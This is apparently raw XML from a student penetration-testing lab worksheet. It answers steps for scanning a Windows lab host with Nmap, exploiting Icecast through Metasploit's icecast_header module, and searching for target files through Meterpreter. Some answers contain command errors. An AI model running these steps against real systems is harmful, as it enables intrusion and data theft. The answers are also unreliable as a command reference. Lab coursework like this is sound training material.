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a service and version scan using Nmap to determine which services are up and running:</w:t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Nmap command that performs a service and version scan against the target.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: Nmap -sV was able to find multiple open ports running the services below and the associated port.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25 - smtp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">SLmail smtpd 5.5.0.443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135 - msrpc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft windows rpc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139 - netbios-ssn</w:t>
        <w:tab/>
        <w:t xml:space="preserve">microsoft windows netbios-ssn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445 - microsoft-ds?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3389 - ms-wbt-server</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft Terminal Services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8000 - http</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Icecast Streaming Media Server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previous step, we see that the Icecast service is running. Let's start by attacking that service. Search for any Icecast exploits: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SearchSploit commands to show available Icecast exploits.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: The only exploit available within metasploit for icecast is the icecast header overwrite exploit. </w:t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 that we know which exploits are available to us, let's start Metasploit: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command that starts Metasploit:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: Metasploit is run by msfd. The exploit was then ran after. See attached picture. </w:t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the Icecast module and load it for use.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command to search for the Icecast module:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: search </w:t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command to use the Icecast module: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Instead of copying the entire path to the module, you can use the number in front of it.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: exploit windows/http/icecast_header</w:t>
        <w:br w:type="textWrapping"/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RHOST to the target machine.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command that sets the RHOST:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: rhost=192.168.0.20</w:t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Icecast exploit.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command that runs the Icecast exploit.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: run</w:t>
        <w:br w:type="textWrapping"/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command that performs a search for the secretfile.txt on the target.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: (must be in the C: drive directory) search -f *secretfile.txt</w:t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should now have a Meterpreter session open.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command to performs a search for the recipe.txt on the target:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: search -f *recipe.txt</w:t>
        <w:br w:type="textWrapping"/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Run the command that exfiltrates the recipe*.txt file:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Answer: </w:t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also use Meterpreter's local exploit suggester to find possible exploits.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exploit suggester is just that: a suggestion. Keep in mind that the listed suggestions may not include all available exploits.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